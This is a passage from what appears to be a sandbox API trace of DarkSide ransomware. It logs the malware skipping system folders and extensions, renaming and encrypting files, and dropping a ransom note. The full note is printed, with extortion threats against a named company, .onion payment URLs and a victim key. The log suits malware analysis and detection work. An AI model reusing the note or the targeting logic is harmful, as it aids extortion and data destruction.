Size=0x10000) returned 0x44e0080 [0147.903] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1ASIo.pptx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1ASIo.pptx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1ASIo.pptx" [0147.903] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1ASIo.pptx") returned 0x35 [0147.903] wcscpy (in: _Dest=0x44e00ea, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.903] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1ASIo.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1asio.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1ASIo.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1asio.pptx.c06622a1"), dwFlags=0x8) returned 1 [0147.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1ASIo.pptx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1asio.pptx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x624 [0147.906] CreateIoCompletionPort (FileHandle=0x624, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0147.906] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x48b0020 [0147.911] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5b26c964 [0147.911] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a6c0124 [0147.911] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1f42e177 [0147.911] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x706864b0 [0147.911] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3ab9bec5 [0147.911] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4478d592 [0147.911] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x47b97979 [0147.911] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4d9f1767 [0147.914] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x48b0094, Length=0x80) returned 0x653824af [0147.914] RtlComputeCrc32 (PartialCrc=0x24af, Buffer=0x48b0094, Length=0x80) returned 0x1be7eb6f [0147.914] RtlComputeCrc32 (PartialCrc=0xeb6f, Buffer=0x48b0094, Length=0x80) returned 0x4cbc0e85 [0147.914] RtlComputeCrc32 (PartialCrc=0xe85, Buffer=0x48b0094, Length=0x80) returned 0xae35c561 [0147.914] RtlComputeCrc32 (PartialCrc=0xc561, Buffer=0x48b0094, Length=0x80) returned 0xc8ab345a [0147.914] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0147.914] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.914] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.914] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e40b230, ftCreationTime.dwHighDateTime=0x1d5df2a, ftLastAccessTime.dwLowDateTime=0xd2b7e370, ftLastAccessTime.dwHighDateTime=0x1d5e316, ftLastWriteTime.dwLowDateTime=0xd2b7e370, ftLastWriteTime.dwHighDateTime=0x1d5e316, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="H1L2uD_Z3TzCntcS0qS", cAlternateFileName="H1L2UD~1")) returned 1 [0147.915] _wcsicmp (_Str1="$recycle.bin", _Str2="H1L2uD_Z3TzCntcS0qS") returned -68 [0147.915] wcslen (_String="$recycle.bin") returned 0xc [0147.915] _wcsicmp (_Str1="config.msi", _Str2="H1L2uD_Z3TzCntcS0qS") returned -5 [0147.915] wcslen (_String="config.msi") returned 0xa [0147.915] _wcsicmp (_Str1="$windows.~bt", _Str2="H1L2uD_Z3TzCntcS0qS") returned -68 [0147.915] wcslen (_String="$windows.~bt") returned 0xc [0147.915] _wcsicmp (_Str1="$windows.~ws", _Str2="H1L2uD_Z3TzCntcS0qS") returned -68 [0147.915] wcslen (_String="$windows.~ws") returned 0xc [0147.915] _wcsicmp (_Str1="windows", _Str2="H1L2uD_Z3TzCntcS0qS") returned 15 [0147.915] wcslen (_String="windows") returned 0x7 [0147.915] _wcsicmp (_Str1="appdata", _Str2="H1L2uD_Z3TzCntcS0qS") returned -7 [0147.915] wcslen (_String="appdata") returned 0x7 [0147.915] _wcsicmp (_Str1="application data", _Str2="H1L2uD_Z3TzCntcS0qS") returned -7 [0147.915] wcslen (_String="application data") returned 0x10 [0147.915] _wcsicmp (_Str1="boot", _Str2="H1L2uD_Z3TzCntcS0qS") returned -6 [0147.915] wcslen (_String="boot") returned 0x4 [0147.915] _wcsicmp (_Str1="google", _Str2="H1L2uD_Z3TzCntcS0qS") returned -1 [0147.915] wcslen (_String="google") returned 0x6 [0147.915] _wcsicmp (_Str1="mozilla", _Str2="H1L2uD_Z3TzCntcS0qS") returned 5 [0147.915] wcslen (_String="mozilla") returned 0x7 [0147.915] _wcsicmp (_Str1="program files", _Str2="H1L2uD_Z3TzCntcS0qS") returned 8 [0147.915] wcslen (_String="program files") returned 0xd [0147.915] _wcsicmp (_Str1="program files (x86)", _Str2="H1L2uD_Z3TzCntcS0qS") returned 8 [0147.915] wcslen (_String="program files (x86)") returned 0x13 [0147.915] _wcsicmp (_Str1="programdata", _Str2="H1L2uD_Z3TzCntcS0qS") returned 8 [0147.915] wcslen (_String="programdata") returned 0xb [0147.915] _wcsicmp (_Str1="system volume information", _Str2="H1L2uD_Z3TzCntcS0qS") returned 11 [0147.915] wcslen (_String="system volume information") returned 0x19 [0147.915] _wcsicmp (_Str1="tor browser", _Str2="H1L2uD_Z3TzCntcS0qS") returned 12 [0147.915] wcslen (_String="tor browser") returned 0xb [0147.915] _wcsicmp (_Str1="windows.old", _Str2="H1L2uD_Z3TzCntcS0qS") returned 15 [0147.915] wcslen (_String="windows.old") returned 0xb [0147.915] _wcsicmp (_Str1="intel", _Str2="H1L2uD_Z3TzCntcS0qS") returned 1 [0147.915] wcslen (_String="intel") returned 0x5 [0147.915] _wcsicmp (_Str1="msocache", _Str2="H1L2uD_Z3TzCntcS0qS") returned 5 [0147.915] wcslen (_String="msocache") returned 0x8 [0147.915] _wcsicmp (_Str1="perflogs", _Str2="H1L2uD_Z3TzCntcS0qS") returned 8 [0147.915] wcslen (_String="perflogs") returned 0x8 [0147.916] _wcsicmp (_Str1="x64dbg", _Str2="H1L2uD_Z3TzCntcS0qS") returned 16 [0147.916] wcslen (_String="x64dbg") returned 0x6 [0147.916] _wcsicmp (_Str1="public", _Str2="H1L2uD_Z3TzCntcS0qS") returned 8 [0147.916] wcslen (_String="public") returned 0x6 [0147.916] _wcsicmp (_Str1="all users", _Str2="H1L2uD_Z3TzCntcS0qS") returned -7 [0147.916] wcslen (_String="all users") returned 0x9 [0147.916] _wcsicmp (_Str1="default", _Str2="H1L2uD_Z3TzCntcS0qS") returned -4 [0147.916] wcslen (_String="default") returned 0x7 [0147.916] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*" [0147.916] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned 0x2b [0147.916] wcscpy (in: _Dest=0x44b00bc, _Source="H1L2uD_Z3TzCntcS0qS" | out: _Dest="H1L2uD_Z3TzCntcS0qS") returned="H1L2uD_Z3TzCntcS0qS" [0147.916] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.916] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.916] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS" [0147.916] GetNamedSecurityInfoW () returned 0x0 [0147.916] SetEntriesInAclW () returned 0x0 [0147.916] SetNamedSecurityInfoW () returned 0x0 [0147.918] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d570b8) returned 1 [0147.918] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0147.918] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1l2ud_z3tzcntcs0qs")) returned 1 [0147.918] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0147.918] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1l2ud_z3tzcntcs0qs\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0147.918] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0147.919] CloseHandle (hObject=0x1c) returned 1 [0147.919] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0147.919] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1l2ud_z3tzcntcs0qs")) returned 0x10 [0147.919] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS\\") returned="" [0147.919] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS\\") returned 0x3e [0147.919] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0147.920] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e40b230, ftCreationTime.dwHighDateTime=0x1d5df2a, ftLastAccessTime.dwLowDateTime=0xd6c934a0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd6c934a0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0147.920] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fd02690, ftCreationTime.dwHighDateTime=0x1d5e7a1, ftLastAccessTime.dwLowDateTime=0xf59cf030, ftLastAccessTime.dwHighDateTime=0x1d5dcfc, ftLastWriteTime.dwLowDateTime=0xf59cf030, ftLastWriteTime.dwHighDateTime=0x1d5dcfc, nFileSizeHigh=0x0, nFileSizeLow=0xfc89, dwReserved0=0x0, dwReserved1=0x0, cFileName="Iq1TGVcomjA.m4a", cAlternateFileName="IQ1TGV~1.M4A")) returned 1 [0147.920] _wcsicmp (_Str1="Iq1TGVcomjA.m4a", _Str2="README.c06622a1.TXT") returned -9 [0147.920] wcsstr (_Str="Iq1TGVcomjA.m4a", _SubStr="README") returned 0x0 [0147.920] _wcsicmp (_Str1="autorun.inf", _Str2="Iq1TGVcomjA.m4a") returned -8 [0147.920] wcslen (_String="autorun.inf") returned 0xb [0147.920] _wcsicmp (_Str1="boot.ini", _Str2="Iq1TGVcomjA.m4a") returned -7 [0147.920] wcslen (_String="boot.ini") returned 0x8 [0147.920] _wcsicmp (_Str1="bootfont.bin", _Str2="Iq1TGVcomjA.m4a") returned -7 [0147.920] wcslen (_String="bootfont.bin") returned 0xc [0147.920] _wcsicmp (_Str1="bootsect.bak", _Str2="Iq1TGVcomjA.m4a") returned -7 [0147.920] wcslen (_String="bootsect.bak") returned 0xc [0147.920] _wcsicmp (_Str1="desktop.ini", _Str2="Iq1TGVcomjA.m4a") returned -5 [0147.920] wcslen (_String="desktop.ini") returned 0xb [0147.920] _wcsicmp (_Str1="iconcache.db", _Str2="Iq1TGVcomjA.m4a") returned -14 [0147.920] wcslen (_String="iconcache.db") returned 0xc [0147.920] _wcsicmp (_Str1="ntldr", _Str2="Iq1TGVcomjA.m4a") returned 5 [0147.920] wcslen (_String="ntldr") returned 0x5 [0147.920] _wcsicmp (_Str1="ntuser.dat", _Str2="Iq1TGVcomjA.m4a") returned 5 [0147.920] wcslen (_String="ntuser.dat") returned 0xa [0147.920] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Iq1TGVcomjA.m4a") returned 5 [0147.920] wcslen (_String="ntuser.dat.log") returned 0xe [0147.920] _wcsicmp (_Str1="ntuser.ini", _Str2="Iq1TGVcomjA.m4a") returned 5 [0147.920] wcslen (_String="ntuser.ini") returned 0xa [0147.920] _wcsicmp (_Str1="thumbs.db", _Str2="Iq1TGVcomjA.m4a") returned 11 [0147.920] wcslen (_String="thumbs.db") returned 0x9 [0147.920] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0147.920] wcslen (_String="386") returned 0x3 [0147.920] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0147.920] wcslen (_String="adv") returned 0x3 [0147.920] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0147.920] wcslen (_String="ani") returned 0x3 [0147.920] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0147.921] wcslen (_String="bat") returned 0x3 [0147.921] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0147.921] wcslen (_String="bin") returned 0x3 [0147.921] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0147.921] wcslen (_String="cab") returned 0x3 [0147.921] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0147.921] wcslen (_String="cmd") returned 0x3 [0147.921] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0147.921] wcslen (_String="com") returned 0x3 [0147.921] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0147.921] wcslen (_String="cpl") returned 0x3 [0147.921] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0147.921] wcslen (_String="cur") returned 0x3 [0147.921] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0147.921] wcslen (_String="deskthemepack") returned 0xd [0147.921] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0147.921] wcslen (_String="diagcab") returned 0x7 [0147.921] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0147.921] wcslen (_String="diagcfg") returned 0x7 [0147.921] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0147.921] wcslen (_String="diagpkg") returned 0x7 [0147.921] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0147.921] wcslen (_String="dll") returned 0x3 [0147.921] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0147.921] wcslen (_String="drv") returned 0x3 [0147.921] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0147.921] wcslen (_String="exe") returned 0x3 [0147.921] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0147.921] wcslen (_String="hlp") returned 0x3 [0147.921] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0147.921] wcslen (_String="icl") returned 0x3 [0147.921] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0147.921] wcslen (_String="icns") returned 0x4 [0147.921] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0147.921] wcslen (_String="ico") returned 0x3 [0147.921] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0147.921] wcslen (_String="ics") returned 0x3 [0147.921] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0147.922] wcslen (_String="idx") returned 0x3 [0147.922] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0147.922] wcslen (_String="ldf") returned 0x3 [0147.922] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0147.922] wcslen (_String="lnk") returned 0x3 [0147.922] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0147.922] wcslen (_String="mod") returned 0x3 [0147.922] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0147.922] wcslen (_String="mpa") returned 0x3 [0147.922] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0147.922] wcslen (_String="msc") returned 0x3 [0147.922] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0147.922] wcslen (_String="msp") returned 0x3 [0147.922] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0147.922] wcslen (_String="msstyles") returned 0x8 [0147.922] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0147.922] wcslen (_String="msu") returned 0x3 [0147.922] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0147.922] wcslen (_String="nls") returned 0x3 [0147.922] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0147.922] wcslen (_String="nomedia") returned 0x7 [0147.922] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0147.922] wcslen (_String="ocx") returned 0x3 [0147.922] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0147.922] wcslen (_String="prf") returned 0x3 [0147.922] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0147.922] wcslen (_String="ps1") returned 0x3 [0147.922] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0147.922] wcslen (_String="rom") returned 0x3 [0147.922] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0147.922] wcslen (_String="rtp") returned 0x3 [0147.922] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0147.922] wcslen (_String="scr") returned 0x3 [0147.922] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0147.922] wcslen (_String="shs") returned 0x3 [0147.922] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0147.922] wcslen (_String="spl") returned 0x3 [0147.922] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0147.922] wcslen (_String="sys") returned 0x3 [0147.923] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0147.923] wcslen (_String="theme") returned 0x5 [0147.923] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0147.923] wcslen (_String="themepack") returned 0x9 [0147.923] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0147.923] wcslen (_String="wpx") returned 0x3 [0147.923] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0147.923] wcslen (_String="lock") returned 0x4 [0147.923] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0147.923] wcslen (_String="key") returned 0x3 [0147.923] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0147.923] wcslen (_String="hta") returned 0x3 [0147.923] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0147.923] wcslen (_String="msi") returned 0x3 [0147.923] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0147.923] wcslen (_String="pdb") returned 0x3 [0147.923] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0147.923] wcslen (_String="sql") returned 0x3 [0147.923] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0147.923] wcslen (_String="sqlite") returned 0x6 [0147.923] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1l2ud_z3tzcntcs0qs")) returned 0x10 [0147.923] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0147.923] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS" [0147.923] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS") returned 0x3d [0147.923] wcscpy (in: _Dest=0x450010c, _Source="Iq1TGVcomjA.m4a" | out: _Dest="Iq1TGVcomjA.m4a") returned="Iq1TGVcomjA.m4a" [0147.923] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS\\Iq1TGVcomjA.m4a", dwFileAttributes=0x80) returned 1 [0147.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS\\Iq1TGVcomjA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1l2ud_z3tzcntcs0qs\\iq1tgvcomja.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0147.924] SetFilePointerEx (in: hFile=0x618, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.924] ReadFile (in: hFile=0x618, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0147.924] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x3425226e [0147.924] RtlComputeCrc32 (PartialCrc=0x226e, Buffer=0x3fe8f4, Length=0x80) returned 0x7eab0f6e [0147.924] RtlComputeCrc32 (PartialCrc=0xf6e, Buffer=0x3fe8f4, Length=0x80) returned 0x175c700a [0147.924] RtlComputeCrc32 (PartialCrc=0x700a, Buffer=0x3fe8f4, Length=0x80) returned 0xf35f3c5 [0147.924] RtlComputeCrc32 (PartialCrc=0xf3c5, Buffer=0x3fe8f4, Length=0x80) returned 0x6d3e5ac2 [0147.924] CloseHandle (hObject=0x618) returned 1 [0147.925] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0147.925] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS\\Iq1TGVcomjA.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS\\Iq1TGVcomjA.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS\\Iq1TGVcomjA.m4a" [0147.925] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS\\Iq1TGVcomjA.m4a") returned 0x4d [0147.925] wcscpy (in: _Dest=0x4510132, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.925] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS\\Iq1TGVcomjA.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1l2ud_z3tzcntcs0qs\\iq1tgvcomja.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS\\Iq1TGVcomjA.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1l2ud_z3tzcntcs0qs\\iq1tgvcomja.m4a.c06622a1"), dwFlags=0x8) returned 1 [0147.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\H1L2uD_Z3TzCntcS0qS\\Iq1TGVcomjA.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h1l2ud_z3tzcntcs0qs\\iq1tgvcomja.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 